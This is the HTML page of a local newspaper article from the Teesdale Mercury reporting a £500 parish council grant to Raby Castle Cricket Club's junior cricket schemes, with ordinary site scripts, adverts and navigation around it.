<!DOCTYPE html>
<!--[if lt IE 7]>
<html class="no-js ie6 oldie" lang="en"> <![endif]-->
<!--[if IE 7]>
<html class="no-js ie7 oldie" lang="en"> <![endif]-->
<!--[if IE 8]>
<html class="no-js ie8 oldie" lang="en"> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js" lang="en"> <!--<![endif]-->
<head>
	<meta charset="utf-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />

	<title>&pound;500 boost for junior cricket     at Raby  - Sport - Teesdale Mercury</title>
	<meta name="description" content="Sport - Teesdale Mercury" />
    <!-- page specific meta -->
	<link rel="canonical" href="https://www.teesdalemercury.co.uk/sport/500-boost-for-junior-cricket--at-raby" />
   <meta name="twitter:card" content="summary_large_image" />
   <meta name="twitter:image" content="https://www.teesdalemercury.co.uk/assets/images/articles/thumbs/3653.jpg" />
   <meta name="twitter:site" content="@teesdalemercury" />
   <meta name="twitter:title" content="&pound;500 boost for junior cricket     at Raby " />
   <meta name="twitter:description" content="STAINDROP Parish Council has thrown its support behind a successful scheme that is getting more youngsters from their village getting involved in cricket." />
   <meta property="og:url" content="https://www.teesdalemercury.co.uk/perma_link/3123" />
   <meta property="og:type" content="article" />
   <meta property="og:title" content="&pound;500 boost for junior cricket     at Raby " />
   <meta property="og:description" content="STAINDROP Parish Council has thrown its support behind a successful scheme that is getting more youngsters from their village getting involved in cricket." />
   <meta property="og:image" content="https://www.teesdalemercury.co.uk/assets/images/articles/thumbs/3653.jpg" />
   <meta property="og:image:width" content="737" />
   <meta property="og:image:height" content="461" />
   <meta property="fb:app_id" content="1969332043340459" />

	<!--                   -->
	    <link rel="stylesheet" href="/assets/css/normalize.css" media="all" />
    <link rel="stylesheet" href="/assets/css/bootstrap.min.css" media="all" />
    <link rel="stylesheet" href="/assets/js/fancybox/jquery.fancybox.min.css" media="all" />

    <link rel="icon" type="image/png" href="/assets/images/favicon-16x16.png" sizes="16x16">
    <link rel="icon" type="image/png" href="/assets/images/favicon-32x32.png" sizes="32x32">
    <link rel="icon" type="image/png" href="/assets/images/favicon-96x96.png" sizes="96x96">

    <link rel="apple-touch-icon" href="/assets/images/icon-120x120.png">
    <link rel="apple-touch-icon" sizes="180x180" href="/assets/images/icon-120x120.png">
    <link rel="apple-touch-icon" sizes="152x152" href="/assets/images/icon-152x152.png">
    <link rel="apple-touch-icon" sizes="167x167" href="/assets/images/icon-167x167.png">

    <!-- Responsive and mobile friendly stuff -->
    <meta http-equiv="cleartype" content="on">
    <meta name="HandheldFriendly" content="True">
    <meta name="MobileOptimized" content="320">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no" />

    <script src="/assets/js/jquery-3.2.1.min.js"></script>
    <script src="/assets/js/modernizr-1.5.min.js"></script>
    <script src="/assets/js/bootstrap.min.js"></script>
    <script src="/assets/js/selectivizr.js"></script>
    <script src="/assets/js/jquery.hoverIntent.min.js"></script>
    <script src="/assets/js/fancybox/jquery.fancybox.min.js"></script>
    <script>
        window.twttr = (function(d, s, id)
        {
            var js, fjs = d.getElementsByTagName(s)[0],
                t = window.twttr || {};
            if (d.getElementById(id)) return t;
            js = d.createElement(s);
            js.id = id;
            js.src = "https://platform.twitter.com/widgets.js";
            fjs.parentNode.insertBefore(js, fjs);

            t._e = [];
            t.ready = function(f)
            {
                t._e.push(f);
            };
            return t;
        }(document, "script", "twitter-wjs"));
    </script>

    <!-- template selection -->
    <link rel="stylesheet" href="/assets/css/er-core.css" media="all" />
    <script src="/assets/js/er-core.js"></script>
    <!--                    -->

    <!-- site customisation -->
    <link href="https://fonts.googleapis.com/css?family=Lora:700|Muli:200,400,400i,700,700i&amp;subset=latin-ext" rel="stylesheet">
    <script src="/assets/js/jquery.wow.min.js"></script>
    <script src="/assets/js/site.js?1518093187"></script>
    <link rel="stylesheet" href="/assets/css/site.css?1557755181" media="all" />
    <!--                    -->

	
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-113589909-1"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'UA-113589909-1');
    </script>

    
	<!-- page specific css and js -->
	
	<!--                   -->

</head>

<body class="news">
    <div id="fb-root"></div>
    <script>(function(d, s, id) {
      var js, fjs = d.getElementsByTagName(s)[0];
      if (d.getElementById(id)) return;
      js = d.createElement(s); js.id = id;
      js.src = 'https://connect.facebook.net/en_GB/sdk.js#xfbml=1&version=v2.11&appId=&autoLogAppEvents=1';
      fjs.parentNode.insertBefore(js, fjs);
    }(document, 'script', 'facebook-jssdk'));</script>
    <div id="mainNav">
        <div class="mainNavBackground"></div>
        <div class="mainNavInner cf">
            <nav class="mainNavMajor">
                <ul>
                                            <li><a href="/news/">News</a></li>
                                            <li><a href="/features/">Features</a></li>
                                            <li><a href="/business/">Business</a></li>
                                            <li><a href="/sport/">Sport</a></li>
                                            <li><a href="/art-and-leisure/">Art & Leisure</a></li>
                                            <li><a href="/country-life/">Country Life</a></li>
                                    </ul>
            </nav>
            <nav class="mainNavMinor">
                <ul>
                                            <li><a href="/about/">About Us</a></li>
                                            <li><a href="/advertise/">Advertise</a></li>
                                            <li><a href="/shop/">Shop</a></li>
                                            <li><a href="/subscribe/">Subscribe</a></li>
                                            <li><a href="/photo-sales/">Photo Sales</a></li>
                                    </ul>
            </nav>
            <a href="#" class="mainNavClose">×</a>
        </div>
    </div>
    <div id="searchOverlay">
        <div class="searchBackground"></div>
        <div class="searchInner cf">
            <h2>Search</h2>
            <form class="searchForm" action="/search/" method="get">
                <div class="searchFieldContainer">
                    <input type="search" name="search" class="searchField" autocomplete="off" />
                    <input type="submit" value="" class="searchSubmit" />
                </div>
            </form>
            <a href="#" class="searchClose">×</a>
        </div>
    </div>
    <div class="advert adHeaderLeaderboard"><div class="adLargeLeaderboard"><a href="/advert.php?advert=25" target="_blank" rel="nofollow"><img src="/assets/ads/25_1.png" alt="Addisons" /></a></div><div class="adMobileLeaderboard"><a href="/advert.php?advert=25" target="_blank" rel="nofollow"><img src="/assets/ads/25_2.png" alt="Addisons" /></a></div></div>    <header class="mainHeader">
            <div class="headerTop">
                Sunday, March 1, 2020 <span class="weather"><span class="weatherIcon"><img src="/assets/images/weather/12.svg" alt="Light rain" title="Light rain" /></span> <span title="Barnard Castle, 4:56pm, 1st March 2020">4.5&deg;C</span></span>            </div>
            <div class="headerMain">
                <div class="container-fluid">
                    <div class="row">
                        <div class="headerLeft col-xs-2 col-sm-4 col-md-3">
                            <a class="button headerButton menuToggle" href="#"><span>Menu</span></a>
                            <a class="headerIcon searchToggle" href="#search" title="Search"></a>
                        </div>
                        <div class="headerMiddle col-xs-8 col-sm-4 col-md-6">
                            <a href="/"><img src="/assets/images/logo.svg" alt="Teesdale Mercury" class="logo" /></a>
                        </div>
                        <div class="headerRight col-xs-2 col-sm-4 col-md-3">
                            <a class="topLink topLink" href="#">Top</a>
                            <a class="searchToggle headerButton" href="#search" title="Search"></a>
                            <div class="headerRightSocial">
                                <a class="button headerButton" href="/contact/">Contact</a>
                                                                                <a href="https://twitter.com/teesdalemercury" class="headerIcon social" style="background-image:url(/assets/images/social/1.svg)" rel="me" target="_blank"></a>
                                                                                            <a href="https://www.facebook.com/teesdalemercury" class="headerIcon social" style="background-image:url(/assets/images/social/2.svg)" rel="me" target="_blank"></a>
                                                                        </div>
                        </div>
                    </div>
                    <div class="row topNavigationContainer">
                        <div class="col-xs-12">
                            <nav>
                                <ul>
                                                                            <li><a href="/news/">News</a></li>
                                                                            <li><a href="/features/">Features</a></li>
                                                                            <li><a href="/business/">Business</a></li>
                                                                            <li><a href="/sport/">Sport</a></li>
                                                                            <li><a href="/art-and-leisure/">Art & Leisure</a></li>
                                                                            <li><a href="/country-life/">Country Life</a></li>
                                                                            <li><a href="/shop">Shop</a></li>
                                                                            <li><a href="/subscribe">Subscribe</a></li>
                                                                    </ul>
                            </nav>
                        </div>
                    </div>
                </div>
            </div>
        </header>
        <div class="mainBody container-fluid" id="mainBody">
    <div class="mediaGallery">
                <a href="/assets/images/articles/large/3653.jpg" data-fancybox="group" data-options='{"caption" : "POPULAR: The All Stars cricket programme has proved a hit with youngsters at Raby Castle CC			   TM pic"}' data-media-id="3653" class="figureLink"></a>
                </div>
    <article class="news">
    <div class="articleHeader">
        <a href="/sport/" class="sectionLink">Sport</a>
        <h1>&pound;500 boost for junior cricket     at Raby </h1>
    </div>
    <div class="twoColumnLayoutContainer">
        <div class="mainColumn">
            <div class="byLine">
                <p>By <strong>Martin Paul</strong> - Senior Reporter <time datetime="2020-03-01 07:00:00">• 1 Mar 2020</time></p>
            </div>
            <div class="articleBody">
                <figure class="image" data-media-id="3653">
<div class="mediaContainer imageContainer">
<img class="storyImage" alt="POPULAR: The All Stars cricket programme has proved a hit with youngsters at Raby Castle CC			   TM pic" src="/assets/images/articles/medium/3653.jpg" />
</div>
<figcaption>POPULAR: The All Stars cricket programme has proved a hit with youngsters at Raby Castle CC			   TM pic</figcaption>
</figure>
                                <p>STAINDROP Parish Council has thrown its support behind a successful scheme that is getting more youngsters from their village getting involved in cricket.</p><p>Members heard during their meeting on Thursday last week how, until three years ago, there had been almost no cricket available for young children to take part in.</p><p>This changed when Raby Castle Cricket Club signed up to the England and Wales Cricket Board’s (ECB) All Stars scheme aimed at those aged between four and eight.</p><p>Club secretary Stephen Cayhill, who started the scheme, told the council: “The first year I had 32 youngsters participating in the programme, the following year I had 41. </p><p>“So, obviously we are doing something right. </p><p>“Obviously those children get a little bit older and we have to do something to take them from the age of eight to 13. So, what we have done is enrolled in the latest ECB programme, which is called Dynamos.”</p><p>He added that the club now also has a successful junior section for children up to the age of 13, and players currently enjoy indoor net practice with the club.</p><p>Mr Cayhill said: “On a good night we get nearly 20 kids coming at this time of year to practice.”
<div class="adInArticleMediumRectangle"><div class="advert adRightMediumRectangle"><div class="adMediumRectangle"><a href="/advert.php?advert=37" target="_blank" rel="nofollow"><img src="/assets/ads/37_3.jpg" alt="Northallerton Heating" /></a></div></div></div>
</p><p>However, he said these activities were putting a financial strain on the club, which did not have traditional sources of income, such as a bar, as they operate from the grounds of Raby Castle, and could not compete against the tourist attraction’s café and facilities.</p><p>Some of the costs, he said, included sending club members on training courses in coaching cricket, health and safety, first aid, child welfare and safeguarding.</p><p>He said: “We do raise all our own funding. We spent over £2,000 on our ground just preparing the wicket and the outfield, and that is just material costs – we have a volunteer corps that takes care of that.”</p><p>Currently the club raises its cash through raffles, race nights and a presentation night, but it needs help to grow the junior section, he said.</p><p>He added: “We have been on the go for over 125 years and we would like to appeal to the council to help us out with funding.”</p><p>In answering the parish council’s question about how much the club needed, he responded: “Anything north of a couple of hundred pounds would be useful, for example I went on a two-day coaching course late last year and the price for that was £150. </p><p>“Anything you could give us would be appreciated.”</p><p>Impressed by Mr Cayhill’s bid, the parish council agreed it would give the cricket club £500 and the cash would be available from the next financial year, which begins on April 1.&nbsp;</p>            </div>
            <div class="sharer">
                <div class="sharerInner cf">
                    <div class="sharerFacebook"><div class="fb-share-button" data-href="https://www.teesdalemercury.co.uk/perma_link/3123" data-layout="button" data-size="large" data-mobile-iframe="true"><a class="fb-xfbml-parse-ignore" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.teesdalemercury.co.uk%2Fperma_link%2F3123">Share</a></div></div>
                    <div class="sharerTwitter"><a href="https://twitter.com/share?ref_src=twsrc%5Etfw" class="twitter-share-button" data-url="https://www.teesdalemercury.co.uk/perma_link/3123" data-size="large" data-show-count="false">Tweet</a><script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></div>
                </div>
            </div>
        </div>
        <div class="rightColumn">
            <div class="advert adRightMediumRectangle"><div class="adMediumRectangle"><a href="/advert.php?advert=37" target="_blank" rel="nofollow"><img src="/assets/ads/37_3.jpg" alt="Northallerton Heating" /></a></div></div>            <aside class="mostRead">
    <h4>Most Read</h4>
    <ul>
        <li>
            <strong>1</strong>
            <a href="/news/snow-brings-dale-to-a-standstill">Snow brings dale to a standstill</a>
            <time datetime="2020-02-24">24 Feb 2020</time>
        </li>
        <li>
            <strong>2</strong>
            <a href="/business/michael-and-sami-team-up-again-to-cater-for-salons-loyal-clientele">Michael and Sami team up again to cater for salon’s loyal clientele</a>
            <time datetime="2020-02-26">26 Feb 2020</time>
        </li>
        <li>
            <strong>3</strong>
            <a href="/news/parking-ban-in-town-came-out-of-the-blue">Parking ban in town ‘came out of the blue’</a>
            <time datetime="2020-02-26">26 Feb 2020</time>
        </li>
        <li>
            <strong>4</strong>
            <a href="/features/newlook-cafe-for-visitors-to-eggleston-hall">New-look cafe for visitors to Eggleston Hall</a>
            <time datetime="2020-02-26">26 Feb 2020</time>
        </li>
        <li>
            <strong>5</strong>
            <a href="/news/top-five-position-for-school-in-league-tables">Top five position for school in league tables</a>
            <time datetime="2020-02-23">23 Feb 2020</time>
        </li>
    </ul>
</aside>
                        <div class="advert adRightHalfPage adSticky"><div class="adHalfPage"><a href="/advert.php?advert=118" target="_blank" rel="nofollow"><img src="/assets/ads/118_4.jpg" alt="Durtona" /></a></div></div>        </div>
    </div>
    <div class="adBottomHalfPageAd">
        <div class="advert adRightHalfPage adSticky"><div class="adHalfPage"><a href="/advert.php?advert=118" target="_blank" rel="nofollow"><img src="/assets/ads/118_4.jpg" alt="Durtona" /></a></div></div>    </div>
</article>
</div>

<footer>
    <div class="container-fluid footerContainer">
        <div class="row">
            <div class="col-xs-6 col-sm-8">
                <a href="/"><img src="/assets/images/logo.svg" alt="Teesdale Mercury" class="footerLogo" /></a>
                <nav class="footerNav">
                    <ul>
                                                        <li><a href="/news/">News</a></li>
                                                        <li><a href="/features/">Features</a></li>
                                                        <li><a href="/business/">Business</a></li>
                                                        <li><a href="/sport/">Sport</a></li>
                                                        <li><a href="/art-and-leisure/">Art & Leisure</a></li>
                                                        <li><a href="/country-life/">Country Life</a></li>
                                            </ul>
                </nav>
                <nav class="footerNav">
                    <ul>
                                                    <li><a href="/about/">About Us</a></li>
                                                    <li><a href="/contact/">Contact</a></li>
                                                    <li><a href="/advertise/">Advertise</a></li>
                                                    <li><a href="/shop/">Shop</a></li>
                                                    <li><a href="/subscribe/">Subscribe</a></li>
                                                    <li><a href="/photo-sales/">Photo Sales</a></li>
                                            </ul>
                </nav>
            </div>
            <div class="col-xs-6 col-sm-4 footerRightSocial">
                <a class="button footerButton footerContact" href="#">Contact</a>
                                    <a href="https://twitter.com/teesdalemercury" class="headerIcon social" style="background-image:url(/assets/images/social/1.svg)" rel="me" target="_blank"></a>
                                    <a href="https://www.facebook.com/teesdalemercury" class="headerIcon social" style="background-image:url(/assets/images/social/2.svg)" rel="me" target="_blank"></a>
                                <a href="#" class="footerIcon twitter" rel="me"></a>
                <a href="#" class="footerIcon facebook" rel="me"></a>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12">
                <hr class="subFooterBreaker" />
            </div>
        </div>
        <div class="row subFooter">
            <div class="col-xs-12 col-sm-8">
                <nav class="subFooterNav">
                    <ul>
                        <li>&copy2020 Teesdale Mercury</li>
                                                    <li><a href="/privacy/">Privacy Policy</a></li>
                                                    <li><a href="/legal/">Legal</a></li>
                                            </ul>
                </nav>
            </div>
            <div class="col-xs-12 col-sm-4">
                <a href="https://www.edwardrobertson.co.uk/" class="erLink">Designed by Edward Robertson</a>
            </div>
        </div>
    </div>
</footer>
<script>
    payload = "L3JTZXB5KzVNc0VGdDdkVHMzN3orbVlVTVhjdVhCUXpMNStjMVc2c3paSVZQcTlSa3NtNVlza21IUkMwSlQ5djRNUFYrZHgyZXJ1d1NOMEhxZFBwMnNXQ0tESlhKTzE2NkpCZVRTeWJ5eWhLVWF2Sk1zV0oyWkRhVnV5NGgwUVdxUlk1a0diTjhEN1haOG1PVm5hUVlkTGFOQ1AyYkcrUHFzRVFXWTZwbU85V1RjcFhJelR3SkFKNkFoMytNUnU2aUk3OWttWHZUVDJEeWQwMGdKRVBRdlBLZFYza29VL1ZlTUF5MTV0NWF4K1lJcW9pZWFLaythWWlzUlZOSGRKQUUxamRENTFKN28xendHRUllc1VFS2RUVEYwOTZHb0t2NGZIVndmazhZT0E9";
</script>
</body>
</html>
